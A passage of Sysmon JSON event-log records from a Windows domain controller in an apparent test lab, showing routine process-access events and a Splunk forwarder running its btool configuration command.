{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3282,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3283,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3284,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3285,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3286,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-0010AD600500}\r\nTargetProcessId: 3320\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-0010AD600500}","TargetProcessId":"3320","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3287,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.132\r\nProcessGuid: {41C8662E-1FF4-5F25-0000-001069610500}\r\nProcessId: 2848\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010AD600500}\r\nParentProcessId: 3320\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.132","ProcessGuid":"{41C8662E-1FF4-5F25-0000-001069610500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010AD600500}","ParentProcessId":"3320","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list general --no-log","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3288,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1FF4-5F25-0000-0010AD600500}\r\nSourceProcessId: 3320\r\nSourceThreadId: 3012\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-001069610500}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1FF4-5F25-0000-0010AD600500}","SourceProcessId":"3320","SourceThreadId":"3012","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-001069610500}","TargetProcessId":"2848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3289,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FF4-5F25-0000-001069610500}\r\nTargetProcessId: 2848\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF4-5F25-0000-001069610500}","TargetProcessId":"2848","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3290,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:32.125","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3291,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:32.125\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 